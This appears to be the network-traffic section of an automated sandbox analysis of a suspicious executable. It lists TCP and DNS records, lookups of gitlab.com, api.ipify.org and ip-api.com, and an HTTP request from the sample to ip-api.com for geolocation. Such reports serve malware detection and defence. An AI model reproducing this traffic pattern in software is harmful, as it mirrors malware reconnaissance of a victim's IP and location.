                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177372932 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177412033 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177445889 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177453995 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177476883 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177577019 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177720070 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177768946 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177798033 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177804947 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.177829027 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178009987 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178009987 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178035975 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178082943 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178092003 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178092003 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178107977 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178134918 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178256035 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178303957 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178344965 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178375006 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178381920 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178400993 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178518057 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178565025 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178611040 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178618908 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178642988 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178693056 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178704977 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178745985 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178776026 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178781986 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.178806067 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.179289103 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266200066 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266268969 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266324997 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266324997 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266341925 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266386032 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266401052 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266452074 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266479969 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266485929 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266504049 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266576052 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266671896 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266731977 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266762972 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266769886 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266792059 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.266963959 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267074108 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267121077 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267148018 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267153978 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267174959 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267430067 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267482042 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267517090 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267524958 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267548084 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267687082 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267707109 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267714024 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267730951 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267735958 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267843962 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267852068 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267884970 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267930031 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267930031 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267930031 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267955065 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.267982006 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.268109083 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.268147945 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.268181086 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.268188000 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.268212080 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.268212080 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354749918 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354804039 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354892969 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354892969 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354907990 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354949951 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354953051 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.354984999 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355010986 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355035067 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355102062 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355108976 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355182886 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355209112 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355215073 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355232000 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355240107 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355263948 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355269909 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355293036 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355371952 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355427027 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355470896 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355501890 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355508089 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355529070 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355612040 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355662107 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355703115 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355736017 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355741978 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355766058 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355860949 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355895996 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355909109 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355942965 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355954885 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355988979 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.355988979 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356267929 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356326103 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356362104 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356369019 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356390953 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356468916 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356718063 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.356718063 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.665421009 CET49847443192.168.2.7172.65.251.78
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.665437937 CET44349847172.65.251.78192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.948951960 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.948995113 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.949115038 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.949378014 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.949392080 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.437760115 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.437865019 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.439265013 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.439271927 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.439599991 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.440488100 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.487328053 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.580048084 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.580104113 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.580151081 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.580387115 CET49864443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.580410004 CET44349864172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.581332922 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.581356049 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.581427097 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.582084894 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:38.582093954 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.035103083 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.035619020 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.035634995 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.036350965 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.036360025 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.164449930 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.164514065 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.164572954 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.165004969 CET49868443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.165023088 CET44349868172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.173815966 CET4987180192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.178620100 CET8049871208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.178786039 CET4987180192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.178786039 CET4987180192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.183624029 CET8049871208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.631936073 CET8049871208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.632265091 CET4987180192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.637279034 CET8049871208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.637341022 CET4987180192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.653399944 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.653419971 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.653661013 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.653829098 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.653841972 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.105736971 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.106178999 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.106200933 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.106692076 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.106697083 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.245626926 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.245692968 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.245743036 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.245980978 CET49875443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.245992899 CET44349875172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.247333050 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.247373104 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.247524977 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.247682095 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.247698069 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.707995892 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.708970070 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.708970070 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.708980083 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.708992004 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.851891994 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.851963997 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.852628946 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.852629900 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.853679895 CET4988580192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.858504057 CET8049885208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.860191107 CET4988580192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.860852003 CET4988580192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:40.865608931 CET8049885208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.150060892 CET49880443192.168.2.7172.67.74.152
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.150087118 CET44349880172.67.74.152192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.323766947 CET8049885208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.325421095 CET4988580192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.330339909 CET8049885208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:41.333302021 CET4988580192.168.2.7208.95.112.1

                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.000796080 CET6482953192.168.2.71.1.1.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.007776022 CET53648291.1.1.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.035365105 CET5938553192.168.2.71.1.1.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.041940928 CET53593851.1.1.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:11.184361935 CET5804353192.168.2.71.1.1.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:11.191191912 CET53580431.1.1.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.941591024 CET6146053192.168.2.71.1.1.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.948386908 CET53614601.1.1.1192.168.2.7
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.166054010 CET5183653192.168.2.71.1.1.1
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.173065901 CET53518361.1.1.1192.168.2.7

                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.000796080 CET192.168.2.71.1.1.10xb4f4Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.035365105 CET192.168.2.71.1.1.10x7385Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:11.184361935 CET192.168.2.71.1.1.10xc88dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.941591024 CET192.168.2.71.1.1.10x727Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.166054010 CET192.168.2.71.1.1.10x1093Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.007776022 CET1.1.1.1192.168.2.70xb4f4No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:10.041940928 CET1.1.1.1192.168.2.70x7385No error (0)google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:11.191191912 CET1.1.1.1192.168.2.70xc88dNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:16.739588976 CET1.1.1.1192.168.2.70xad89No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:16.739588976 CET1.1.1.1192.168.2.70xad89No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.948386908 CET1.1.1.1192.168.2.70x727No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.948386908 CET1.1.1.1192.168.2.70x727No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:37.948386908 CET1.1.1.1192.168.2.70x727No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.173065901 CET1.1.1.1192.168.2.70x1093No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:49:03.999032974 CET1.1.1.1192.168.2.70x13c7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 14, 2025 12:49:03.999032974 CET1.1.1.1192.168.2.70x13c7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                            • gitlab.com
                                                                                                                                                                                                                            • google.com
                                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                                            • api.ipify.org
                                                                                                                                                                                                                            • ip-api.com

                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.749871208.95.112.1805472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.178786039 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Jan 14, 2025 12:48:39.631936073 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:38 GMT
                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 306
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 24
                                                                                                                                                                                                                            X-Rl: 40
